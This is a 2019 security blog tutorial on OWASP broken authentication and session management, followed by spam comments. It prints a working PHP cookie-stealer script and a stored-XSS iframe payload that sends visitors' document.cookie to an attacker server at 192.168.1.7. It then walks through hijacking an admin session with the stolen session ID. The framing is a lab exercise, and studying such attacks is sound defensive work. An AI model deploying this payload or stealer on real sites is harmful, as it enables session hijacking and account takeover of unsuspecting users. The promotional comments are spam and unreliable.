March 10, 2019

OWASP - Broken access and session management


Welcome to The Cybersploit again. Today we will learn about the application of broken access and session management. It holds the 2nd position in the top 10 OWASP vulnerability list of 2017.

What makes the Broken access and session management so vulnerable?
  • User authentication credentials are not protected when stored.
  • Predictable login credentials.
  • Session IDs are exposed in the URL (e.g., URL rewriting).
  • Session IDs are vulnerable to session fixation attacks.
  • Session value does not timeout or does not get invalidated after logout.
  • Session IDs are not rotated after successful login.
  • Passwords, session IDs, and other credentials are sent over unencrypted connections.
The goal of an attack is to take over one or more accounts and for the attacker to get the same privileges as the attacked user.

In this lesson we will apply a persistent XXS of the website and using that we will steal the cookie and gain the admin privilege. Let’s start with creating the cookie stealing script and uploading it to my own web server.

File name: Cookie-stealer.php

<?php
header ("Location: http://192.168.1.7"); //Change it to your webserver address
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Basically after the execution of this script it will steal all the details like the cookie id, user ip, data, time, and referrer and redirect it to 192.168.1.7(your web server address) and write it inside cookies.html file.

Now upload the file to your webserver. In my case I have used my local apache web-server. You can also create one using XAMP. For more details about how to run apache webserver in your local machine please check my previous SQL Injection blog.

Now I will open the website and make a blog entry as an anonymous user
2)      Enter the following html code and post it.

Code:

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.7/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>



Now I will login as admin and view this blog post from another system. Let’s see if the script can capture the user cookie data or not. 

After that let’s move to the previous system and open the cookie.html file to see the captured session ID.



We can see the session ID has been successfully captured, just copy it and open the browser to open the website again in a new window.


According to the above screenshot we can see the user is not logged in. Now open your cookie manager and paste the copied session id from previous system in the place of the current one.


Now save the session id, reload the webpage again and see the result.


Congratulation friends!! Now we have successfully gained the admin privilege. If you need any help or have any further doubts on this topic please feel free to write your comments below. Thank you and happy hacking!!!







  

20 comments:

  1. There's just a major issue with being a specialist creates individual who claims a business without changing this risky idea design!payroll services

    ReplyDelete

  2. Great entertainers ought to be applauded and endeavors given to support that great execution. Poor entertainers need training and help. However after for a short time, if the presentation isn't palatable after help is given, the choice whether that specialist is fitting for that activity must be made by the chief or director.
    Six Sigma

    ReplyDelete
  3. I am happy to find this post Very useful for me, as it contains lot of information. I Always prefer to read The Quality and glad I found this thing in you post. Thanks The Best Task Management Tool

    ReplyDelete
  4. Pretty nice post. I just stumbled upon your weblog and wanted to say that I have really enjoyed browsing your blog posts. After all I’ll be subscribing to your feed and I hope you write again soon! Spunlace fabric for wet wipes

    ReplyDelete
  5. Is your old technology replaced with new technology before you're ready to let it go? And does technology sometimes move too fast? Or is it really just moving too slow? https://www.smore.com/fcn9u-access-card-system

    ReplyDelete
  6. I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. https://accesscontrolsystemsorg.wordpress.com/2021/08/27/access-control-system/

    ReplyDelete
  7. While this isn't thorough, it hits the high places of signs. traffic management plans

    ReplyDelete
  8. Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info. https://bestaccesscardsystem.wordpress.com/2021/10/15/sorts-of-access-control-card-frameworks/

    ReplyDelete
  9. Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info. carbon monoxide

    ReplyDelete
  10. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. access control systems

    ReplyDelete
  11. Hey what a brilliant post I have come across and believe me I have been searching out for this similar kind of post for past a week and hardly came across this. Thank you very much and will look for more postings from you. access card system

    ReplyDelete
  12. I read your blog frequently and I just thought I’d say keep up the amazing work! hire management trainer in Singapore

    ReplyDelete
  13. I was reading some of your content on this website and I conceive this internet site is really informative ! Keep on putting up. https://biometricaccesscontrolsystem.zohosites.in/

    ReplyDelete
  14. Thanks For sharing this Superb article.I use this Article to show my assignment in college.it is useful For me Great Work. https://cegos1.weebly.com/

    ReplyDelete
  15. The hemp is known to absorb cadmium but it really received't clearly show it, so the cannabis plant will grow lacking hurt. management training

    ReplyDelete
  16. Thanks For sharing this Superb article.I use this Article to show my assignment in college.it is useful For me Great Work. card access system in singapore

    ReplyDelete
  17. Very informative post! There is a lot of information here that can help any business get started with a successful social networking campaign. https://site-7698619-8061-5329.mystrikingly.com/blog/10-ways-biometric-access-control-systems-can-improve-your-business

    ReplyDelete
  18. The best investment management in 2010 and then some: no-heap common assets.
    Exponent

    ReplyDelete